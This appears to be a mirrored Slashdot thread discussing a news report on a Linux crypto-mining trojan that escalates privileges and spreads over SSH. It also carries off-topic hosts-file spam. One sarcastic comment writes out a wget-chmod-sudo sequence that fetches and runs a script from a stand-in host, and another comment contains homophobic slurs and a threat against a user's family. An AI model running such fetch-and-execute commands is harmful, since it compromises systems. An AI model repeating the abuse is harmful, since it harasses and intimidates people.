Slashdot Mirror
New Linux Crypto-miner Steals Your Root Password and Disables Your Antivirus (zdnet.com)
Malware targeting Linux users may not be as widespread as the strains targeting the Windows ecosystem, but Linux malware is becoming just as complex and multi-functional as time passes by. ZDNet reports: The latest example of this trend is a new trojan discovered this month by Russian antivirus maker Dr.Web. This new malware strain doesn't have a distinctive name, yet, being only tracked under its generic detection name of Linux.BtcMine.174. But despite the generic name, the trojan is a little bit more complex than most Linux malware, mainly because of the plethora of malicious features it includes. The trojan itself is a giant shell script of over 1,000 lines of code. This script is the first file executed on an infected Linux system. The first thing this script does is to find a folder on disk to which it has write permissions so it can copy itself and later use to download other modules. Once the trojan has a foothold on the system it uses one of two privilege escalation exploits CVE-2016-5195 (also known as Dirty COW) and CVE-2013-2094 to get root permissions and have full access to the OS.
This new malware strain doesn't have a distinctive name, yet,
How about:
VeggieCow (roots!)
AVTerminator
NohupForAll (read the article)
MinerMiner209-519er (perhaps too much a stretch).
Actually you really should read through the article, more interesting than I thought it would be from the summary and this little bugger really does a number on a system.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
that have long since been patched.
update your damn systems, people.
I thought it was nice of the author to freely distribute the source to their malware
1000 lines of code is considered massive for a Trojan? When I was into writing shellcodes and RATs I could do 300 lines of code a day. 1000 really doesn't seem that "complex."
How about something more accurate, like "MalwareForIdiotsWhoDontUnderstandPermissions"?
Seeing the bitcoin prices falling and falling I wonder: "Why would malware creators still create such stuff, isn't there anything more profitable than this?"
It's nets them a small bit of profit now, and they can offer their services or platform to others need their own malware or payload installed.
On the other hand, this gives a lot more prestige to calling someone a script kiddie :D
- dazzle Dazzle Novak
This is an example of why local privilege escalations should never be scoffed at. You can blather all you want about permissions etc, but only one slip is required, and you're shit out of luck
The sad thing is that I've had to argue this point for 20 years now
all I have on my machine is creimer ebooks and videos!
Not one shred of information on /how/ the script got on the system in the first place
I'm calling bullshit on the article.
With such a critical piece of information missing, it's clearly scaremongering and pretty close to fake news.
And it seduces your mum and steals your bike.
All the security holes in EVERYTHING is really getting tiring.
Heil APK
Most Unix like systems are happy without a "root" user as long as there is a user 0 called something.
I still don't agree with the POSIX standard that allows root to write to mode 000 files. If its 000, it was done for a reason and that means even root shouldn't be able to screw with it particularly if it is root:root mode 000.
No antivirus and no root password. I have one machine that's pretty much always idle and another that's a laptop. I would notice the fans kick on if either of those started mining.
I think I'm good.
"Once the trojan has a foothold on the system it uses one of two privilege escalation exploits CVE-2016-5195 (also known as Dirty COW) and CVE-2013-2094 to get root permissions and have full access to the OS."
Is this really malware that is targeting systems that haven't been patched in two years?
Stopped reading after "downloads and runs". MAC (Mandatory Access Control) should be default nowadays in operating systems. DAC (Discretionary Access Control) and its ancient, dumb concepts of users and groups should be left to history and Trivia quizzes. So many vectors would not exist at all, if MAC was default with proper least-privilege policy installed and in effect for every program we use.
The Summary Wrote:
This script is the first file executed on an infected Linux system.
Let's name it systemd!
-=This sig has nothing to do with my comment. Move along now=-
A good precedent is the Morris Worm, the first major worm attack against UNIX systems. Published on Nov. 2, 1988, the worm used known vulnerabilities in popular UNIX tools such as sendmail, and also cracked weak passwords. Defenders effectively _broke_ the early Internet to contain the Morris Worm and while they frantically applied patches they'd considered risks to production systems before that day. Its author was eventually convicted, but Robert Tappan Morris had the best "get out of jail free" card one could imagine. His father was the head of the NSA. He is now a professor of computer science at MIT, and his current projects are listed at https://www.csail.mit.edu/pers... .
You sound like you actually read the article (who does that?)
Anyway does this trojan actually "steal your root password" as the story title states, or does it just use privilege escalation (on long-since patched flaws) to run as root? I mean, does "MySuper3lit3passwrd" actually get sent somewhere?
OK, curiosity got hold of me and I gave in and read the fine article (aaargh!) /bin/su with a malicious version; or
The one partial-sentence quote that addressed it says, "the ability to steal user-entered passwords for the su command"
My best guesses how this would be accomplished are:
1) overwrite
2) keylogger that logs everything, su just happens to be included
One particularly nasty bit:
The trojan will also run a function that collects information about all the remote servers the infected host has connected via SSH and will try to connect to those machines as well, to spread itself to even more systems. This SSH self-spreading mechanism is believed to be the trojan's main distribution channel. Because the trojan also relies on stealing valid SSH credentials, this means that even if some Linux sysadmins are careful to properly secure their servers' SSH connections and only allow a selected number of hosts to connect, they might not be able to prevent an infection if one of those selected hosts has been infected without his knowledge.
One may gobble up all resources on a system, rely on privilege escalation, hide logs, and be very hard to get rid of.
The other one is just malware.
MS appears not to care about bad press. The botnet stink gets replaced by the we'll force updates to 10 policy, we-control-your-W10-PC update policy, and the Windows as a recurring revenue service so we can push advertisements in programs forthcoming policy
See subject quote from the film "I AM LEGEND" & results from the recent past https://it.slashdot.org/commen... https://it.slashdot.org/commen... & https://it.slashdot.org/commen... + https://it.slashdot.org/commen... + https://it.slashdot.org/commen... https://it.slashdot.org/commen... https://search.slashdot.org/co... https://it.slashdot.org/commen...
* That's only recently while I've been on Linux (since June/July 2018) & 100's of times vs. MANY other botnets/malwares etc. in the past circa 2006-early 2018 while I was on Windows: CONCRETE VISIBLE UNDENIABLE REALITY (see those links as proof).
P.S.=> ... & that's ONLY what /. reported on (there are FAR more)... apk
Your software is just fine - well written, functional... I'm going to continue using the Host File Engine by mmell February 17, 2017
Your premise that hostfiles are a good way to deal with advertising and malvertising is quite valid - by JazzLad April 20, 2016
his hosts program is actually pretty good by xenotransplant August 10 2015
his hosts tool is actually useful for those cases in which one does indeed want to locally block stuff outright while consuming minimum system resources by alexgieg September 25 2015
I like your host file system by Karmashock September 09 2015
that APK guy, I use his host file by rogoshen1 Tuesday March 03, 2015
I personally use a HOSTS file blocker produced from a genius called APK by 110010001000 October 27 2017
* For the Win32/64 model...
APK
P.S.=> Linux model's faster/more efficient/better MERGE feature too - More coming... apk
Apk has the answer for that - really... kill automatic updates by adding a hosts file entry setting updates.steam.com or whatever to 127.0.0.1. You have to find the right hostname for each software you want to block updates on by raymorris (2726007) on Friday July 06, 2018
APK your posts on this and the hosts file posts, and more, have never been in error and/or bad advice by BlueStrat (756137) on Wednesday June 21, 2017
I support APK's stand on the hosts file and can't see why it's not used more than it is. My hosts file is 144247 lines long (4,332 Kb) it & a firewall serves me very well - by Trax3001BBS (2368736)
ABP is insufficient as a solid hosts file does everything APK reminds us about fast turtle September 17 2013
You need APK's hosts file - by Teun (17872) on Wednesday August 06, 2014
* For the Win32/64 model...
APK
P.S.=> Linux model's faster/more efficient + BETTER merge feature - More coming... apk
APK is totally right on this count. Adblock Plus on Firefox mobile is a dog on older, or lower end, phones. A hostfile based adblocker makes for a much better experience in this context. Of course, your phone has to be rooted, which isn't the case with Firefox + adblock." - by chihowa on Saturday May 16, 2015
APK solution STILL relevant Thud457 June 11 2015
In a footnote, I would like to note that I find your hosts file admirable - by vel-ex-tech (4337079) on Tuesday November 24, 2015
APK's monolithic hosts file is looking pretty good at the moment - by Culture20 on Thursday November 17
you're right about hosts files - by drinkypoo (153816) on Thursday May 26
APK, I know people give you a lot of shit regarding hosts, but please don't ever stop - by nasredin (958927) on Friday June 12, 2015 @03:34PM
* For the Win32/64 model...
APK
P.S.=> Linux model's faster/more efficient + BETTER merge feature - More coming... apk
APK is kinda right... I've given up on JS based adblocking and gone to blackholing in /etc/hosts, just like it was back in the 90s. The computational load has gotten intolerable for any ad-blocking using JS. I've tried his hosts file generating software. It works. - by bmo (77928) on Thursday October 15, 2015
get around to 'installing' a hosts file list, not sure which one, likely the one from someonewhocares.org. If it works as well as what I used for a while about ten years ago, I'll be happy. And grateful to APK for the lesson and the reminder. - by kermidge (2221646) on Wednesday March 27
I actually went and downloaded a 16k line hosts file and started using that after seeing that post, you know just for trying it out. some sites load up faster. - by gl4ss (559668) on Thursday November 17
dammit MS, you proved APK right about something by lgw
* For the Win32/64 model...
APK
P.S.=> Linux model's faster/more efficient + BETTER merge feature - More coming... apk
(APK) is still right a hosts file really does work. It even blocked a some of the video ads that were inserted into a stream OrangeTide February 10 2016
the Host File Engine performs exactly as promised - by mmell (832646) on Thursday February 16, 2017
I do use APK's host file on all my systems at home by OrangeTide December 01 2017
I've never tried to belittle (APK's work), I've flat out said it's good - by BronsCon (927697) on Thursday February 11, 2016 @06:48PM (#51491263)
(Toss on 100,000++ users worldwide too!)
* For the Win32/64 model...
APK
P.S.=> Linux model's faster/more efficient + BETTER merge feature... apk
name it Gnome 3
These kind of stories come about every year subscription year.
See it was worth reading! It had all kinds of interesting stuff packed in there.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Why would I run AV on a linux system? Screw scanning for MSFT viruses.
Root access should be possible only through sudo, never directly (with very few exceptions).
Only a noob would allow root with a password. You can get root from the console if you need it or by using a highly restricted ssh connection that only allows key/cert based connections and only from very specific IPs. People can't be this stupid. Sorry - I'll take that back.
And the only reason I've used AV on Linux was because a stupid E&O Insurance policy mandated it. The insurance company didn't understand that running AV on non-Windows systems is almost always stupid. But I couldn't speak with anyone inside the insurance company who actually had a clue.
People who have a clue do not work for insurance companies.
Sent from my ASR33 using ASCII
Do you really think nobody knows you're a lying faggot propagandist on this entire website, after all the years of your bullshit getting blown away like 30 minutes ago when your +4 went to -1 Troll, you casually lying faggot? Lol bitch.
There will be consequences for your dishonest advocacy for you and your entire family.
Ironically the script is placed in /etc/rc.local. Probably perfectly compatible with sysVinit.
Remember back when companies in the early 2000s would brag that their software was over a million lines of code, as a testament to some sort of level of complexity? Apparently that threshold has been pushed all the way back to only 1000 lines of code. Honestly, I blame all these copy-paste script kiddies who have never actually written code for thinking that a 1000 line program is "complex" or "large" by any stretch of the imagination.
"Not as clumsy/random as a blaster - An elegant weapon 4 a more civilized age" https://it.slashdot.org/commen...
* "For over a 1,000 generations Jedi Knights were guardians of peace & justice in the old Republic. Before the dark times. Before the EMPIRE"
(NOT "wannabe weapons" of TROLL shitlords on /. like ZIP https://it.slashdot.org/commen... - theirs = effete downmods I RUN 'EM DRY OF & lies & WHY they LOSE).
APK
P.S.=> Many here know https://linux.slashdot.org/com... & enjoy greater speed/security/reliability & anonymity hosts yield natively speeding you up 2 ways (adblocks & hardcodes that protect vs. DNS security issues in redirect poisoning + request tracking logs & RESOLVE FASTER locally from RAM driven by KERNELMODE speed vs. slow usermode in "solutions" packed w/ security issues (DNS/Antivirus) OR not working fully by default (adblock) in usermode addons easily detected by webmasters & blocked doing less but using more)... apk
This is what Windows admins do not understand. Executable bits are turned off in Linux by default. To make anything bad happen, an admin would have to download the virus, make it executable, and run it - preferably as root.
wget http://virus.kremlin.ru/linuxvirus.sh ./linuxvirus.sh ./linuxvirus.sh
chmod +x
sudo
Any Linux admin that is smart enough to run these commands is smart enough not to do this.
Bring them all on. Linux is rock solid and all I got to say is bring them all on.
Having to run unsigned binary executables isn't exactly linux but a bastardisation huh? It's common now. Run as root too
A blog I run for the wealth
nt
GENERATION 26: The first time you see this, copy it into your sig on any forum and add 1 to the generation.
Since when Linux systems have antivirus as a norm? You could scan some unnecessary executable downloads, but that's it. There is no need for permanent resource hog sitting, eating and making you smile by a security illusion. When some bad code has run, the system has to be reinstalled fully. It's already dead inside. So when you install some unknown code, you could as well do that. The greatest security threat is still the promiscuous user.